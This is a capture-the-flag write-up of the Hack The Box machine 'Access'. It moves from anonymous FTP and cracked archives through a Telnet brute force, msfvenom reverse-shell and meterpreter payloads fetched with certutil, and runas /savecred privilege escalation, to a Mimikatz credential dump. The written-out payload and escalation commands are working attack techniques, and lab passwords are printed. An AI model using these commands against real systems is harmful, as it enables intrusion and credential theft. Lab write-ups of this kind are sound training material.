# Access ## Initial Nmap scan ``` nmap -A -T4 10.10.10.98 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 425 Cannot open data connection. | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet? 53/tcp closed domain 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: MegaCorp Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` Anonymous login is allowed on port 21 so we can take a look here. As port 80 is running we can start `Gobuster` first just so we make good use of time. ![Running Gobuster](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-555fd1d3af565071cdc2f4b84418e367e620fb15%2Fimage.png?alt=media) ## FTP Logging in as anonymous on FTP we find two files in the "backups" and "Engineer" folders. Its important to take note of what the output is telling us when grabbing the backup.mdb file as it informs us the file may not have transferred correctly. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1cdb46160ab7c06d3f71de858001c420a8b4688d%2Fimage.png?alt=media) I came across the following link which points us in the right direction on how to best download particular file types from FTP: We should attempt to download both files again issuing the `binary` command before download the files. As per the above link the `binary` command should be issued before downloading the following file types: * image files (e.g. .jpg, .bmp, .png) * sound files (e.g. .mp3, .avi, .wma) * video files (eg. .flv, .mkv, .mov, .mp4), * archive files (e.g. .zip, .rar, .tar) * other files (e.g. .exe, .doc, .xls, .pdf, etc.) Firstly I tried to open the ZIP file with `John` as its password protected however, was unable to find a password in the rockyou.txt wordlist. Before exploring any other wordlists I will check out the backup.mdb file. We have multiple ways of extracting the information from this file and in this instance we will use the following After upload the file I found some interesting information in the "auth\_users" table. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8f4261b1c4db65e7d3d800f84fa90406f67d5780%2Fimage.png?alt=media) First thing I tried was the credentials on the zip file. The password "access4u\@security" allowed me to extract the ZIP file into a PST file. We can then use the Linux command `readpst ` to convert this into a MBOX file. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0714bd0a4767a4d64520c510cf129ef2621a45de%2Fimage.png?alt=media) We can run `cat` on the mbox file and we find the following information: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-63c486323340c1f93ef5461b1e694d5938c9b3a2%2Fimage.png?alt=media) From above we gain the following information Email accounts , possible user account and the password 4Cc3ssC0ntroller. I compiled gathered passwords and potential users accounts and ran these against Hydra. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-483cf1244d0a6854d5a3f2d2d64830b3528e2dae%2Fimage.png?alt=media) Looks like we have some valid credentials against Telnet. After logging in with Telnet we gain access as the user "security" ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-145ba86610daff07076b0f44088b37a788245c08%2Fimage.png?alt=media) From here we can `cd` to the Desktop and grab the user flag. The telnet shell is not too nice to use so I created a reverse TCP shell in `msfvenom` and uploaded it with `certutil.exe`When attempting to execute the shell we was blocked by Group Policy. ``` msfvenom -p windows/x64/shell/reverse_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe ``` Lets set up a Python HTTP server on the directory where the payload has been created. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f568ab0fe5fc1c7d05298f3947d2023b87991e55%2Fimage.png?alt=media) Now we can run the following command to download the payload onto the Windows machine. ``` certutil.exe -urlcache -split -f "http://0.0.0.0/shell.exe ``` From here I attempted to run the payload and was stopped by Group Policy. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ed0374d8f9a7887dfb3d807b43d50c6f2d37d20e%2Fimage.png?alt=media) As Group Policy is enabled and the server has a large amount of updates installed it may be worth us looking for privilege escalation through misconfiguration. After some standard enumeration checks we see that when running `cmdkey /list` that the Administrator has stored credentials. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5b3d53f6641b6265d2e3f95702e5018f035f8fb8%2Fimage.png?alt=media) Lets run `net user` to see if a password is required for this account: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3da07865dc8d3c08b7017d9eeec6379e22518619%2Fimage.png?alt=media) As we can see "Password required" is set to "No" so we can issue commands on behalf of the local administrator account without having the password. We should now be able to execute our shell using the `runas`command. Originally I tried this next part using a `netcat` handler but, every time I got a connection back the shell was unstable or simply did not show any output after the initial connection success message. At this point I instead decided to go for a meterpreter shell handler. ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > met.exe ``` I rqn the payload and uploaded it to the Windows Server and executed it as admin with the following command: ``` runas /savecred /noprofile /user:ACCESS\Administrator met.exe ``` We are now connected as the Administrator. I then used the `getsystem` command to gain shell as "NT AUTHORITY / System". At this point I was expecting to grab the root flag on the administrators Desktop. Instead the root.txt file was encrypted using EFS and I kept getting permission denied when attempting to read the contents. I reset the box and tried again and got the same issue. I was unable to work out how to remove the EFS from the file even when running as System and Administrator. the Cipher thumbprint for the Administrator account and the Cipher used on the root.txt file was the same and I was still unable to remove the encrpytion. I was unsure if how we was connecting with the reverse shell might be having any effect on the file so from here I loaded `Mimikatz` into the shell and dumped all the credentials. We can load this in Meterpreter using the `load kiwi` command. We can then run `creds_all` to get the following output: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5a036faf1b8ab0f85f49c2493f8cd4b06e5a4fbd%2Fimage.png?alt=media) We should now be able to start a fresh telnet session using these credentials. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14f057b2dab4c1fcf55ff435433aa6924b5b6522%2Fimage.png?alt=media)